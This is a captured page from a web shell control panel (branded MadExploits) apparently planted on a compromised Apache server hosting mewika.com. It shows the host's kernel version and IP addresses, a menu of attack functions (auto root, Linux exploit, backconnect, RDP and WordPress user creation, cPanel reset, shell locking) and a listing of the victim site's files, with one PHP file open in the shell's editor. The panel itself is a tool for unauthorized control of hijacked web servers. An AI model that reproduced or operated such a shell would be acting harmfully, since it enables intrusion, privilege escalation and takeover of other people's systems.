Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 18.222.21.222
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
mewika.com /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
assets-new
[ DIR ]
drwxr-xr-x
font
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
1Head.php
6.88
KB
-rw-r--r--
2HeadMenu.php
11.58
KB
-rw-r--r--
3Footer.php
6.72
KB
-rw-r--r--
4End.php
581
B
-rw-r--r--
BannerCoverAll.php
1.83
KB
-rw-r--r--
aboutus.php
2.18
KB
-rw-r--r--
contact-us.php
2.49
KB
-rw-r--r--
content.php
4.77
KB
-rw-r--r--
detail.php
699
B
-rw-r--r--
detail_RecommendedProjects.php
5.09
KB
-rw-r--r--
detail_about.php
1.8
KB
-rw-r--r--
detail_banner.php
3.66
KB
-rw-r--r--
detail_consult.php
2.43
KB
-rw-r--r--
detail_news.php
5.29
KB
-rw-r--r--
detail_ourteam.php
2.96
KB
-rw-r--r--
detail_product.php
9.33
KB
-rw-r--r--
index.php
156
B
-rwxr-xr-x
news.php
3.68
KB
-rw-r--r--
our-services.php
3.84
KB
-rw-r--r--
package.json
14.21
KB
-rw-r--r--
product-detail.php
7.41
KB
-rw-r--r--
project-detail.php
17.72
KB
-rw-r--r--
project.php
3.68
KB
-rw-r--r--
properties.php
17.79
KB
-rw-r--r--
properties_detail.php
2.16
KB
-rw-r--r--
search.php
9.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : BannerCoverAll.php
<?PHP include 'Structure/Structure_Content.php'; while ($objResult_content = mysqli_fetch_array($objQuery_content)) { $ContentID = $objResult_content["Content_ID"]; $ContentName = $objResult_content["Content_Name"]; $ContentContent1 = $objResult_content["Content_Content1"]; $ContentContent2 = $objResult_content["Content_Content2"]; $ContentContent3 = $objResult_content["Content_Content3"]; $ContentContent4 = $objResult_content["Content_Content4"]; $ContentContent5 = $objResult_content["Content_Content5"]; $ContentNumber = $objResult_content["Content_Number"]; $ContentDate = $objResult_content["Content_Date"]; $ContentTime = $objResult_content["Content_Time"]; include 'Structure/Structure_Content_check.php'; $SQL_Content_Img = " SELECT ContentImg_ID , Content_ID, ContentImg_Name , ContentImg_Sort FROM content_img WHERE Content_ID = $ContentID ORDER BY ContentImg_Sort ASC LIMIT 1 "; $objQuery_Content_Img = $objConnect->query($SQL_Content_Img); while ($objResult_Content_Img = mysqli_fetch_array($objQuery_Content_Img)) { $CIMG_ContentImgName = $objResult_Content_Img["ContentImg_Name"]; ?> <div class="beforemainwrap"> <div class="beforemain "> <div class="t3-module module" id="Mod170"> <div class="module-inner"> <div class="module-ct"> <div class="jamasshead inner-banner " style="background-image: linear-gradient(rgba(0,0,0,0.3), rgba(0,0,0,0.5)), url(model/upload/img/IMG_Home/<?= $CIMG_ContentImgName; ?>);background-size:cover;background-position:center;background-repeat:no-repeat;"> <div class="container text-center"> <h1 class="jamasshead-title"><?= $Check_ContentContent1; ?></h1> <div class="jamasshead-description"></div> </div> </div> </div> </div> </div> </div> </div> <?PHP } ?> <?PHP } ?>
Close